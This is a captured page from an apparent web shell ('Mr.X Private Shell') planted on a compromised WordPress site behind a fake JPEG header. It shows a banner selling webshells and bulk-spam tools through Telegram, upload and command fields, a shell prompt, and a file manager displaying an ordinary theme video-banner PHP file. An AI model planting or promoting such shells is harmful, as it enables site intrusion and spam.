����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.249: ~ $
<?php
global $post, $homey_prefix;

$mp4 = get_post_meta($post->ID, $homey_prefix.'header_bg_mp4', true);
$webm = get_post_meta($post->ID, $homey_prefix.'header_bg_webm', true);
$ogv = get_post_meta($post->ID, $homey_prefix.'header_bg_ogv', true);
$video_image_id = get_post_meta($post->ID, $homey_prefix.'video_image', true);
$img_url = wp_get_attachment_image_src( $video_image_id, 'full' );

$ogv = substr($ogv, 0, strrpos($ogv, "."));
$mp4 = substr($mp4, 0, strrpos($mp4, "."));
$webm = substr($webm, 0, strrpos($webm, "."));
$video_image = '';
$bg_image = '';

if(isset($img_url[0])){
    $bg_image = $img_url[0];
    $video_image = substr($img_url[0], 0, strrpos($img_url[0], "."));
}

?>
<style>
    .splash-video-background {
        background-image: url('<?php echo esc_url($bg_image); ?>');
        background-size: cover;
    }
</style>
<section class="top-banner-wrap <?php homey_banner_fullscreen(); ?>">

    <div id="video-background" class="video-background splash-video-background" data-vide-bg="mp4: <?php echo esc_url($mp4); ?>, webm: <?php echo esc_url($webm); ?>, ogv: <?php echo esc_url($ogv); ?>, poster: <?php echo esc_url($bg_image); ?>" data-vide-options="position: 0% 50%">
    </div>

    <div class="banner-caption <?php homey_banner_search_class(); ?>">
        <?php
        homey_banner_search_div_start();

        get_template_part('template-parts/banner/caption');

        if(homey_banner_search()) {
            get_template_part ('template-parts/search/banner-'.homey_banner_search_style());
        }

        homey_banner_search_div_end();
        ?>
    </div><!-- banner-caption -->

</section><!-- header-parallax -->

Filemanager

Name Type Size Permission Actions
caption-exp.php File 740 B 0644
caption.php File 732 B 0644
half-search-exp.php File 1.01 KB 0644
half-search.php File 1 KB 0644
main.php File 1.1 KB 0644
map.php File 793 B 0644
map_experiences.php File 364 B 0644
parallax.php File 877 B 0644
revolution-slider.php File 786 B 0644
slider-exp.php File 5.23 KB 0644
slider.php File 7.23 KB 0644
video.php File 1.62 KB 0644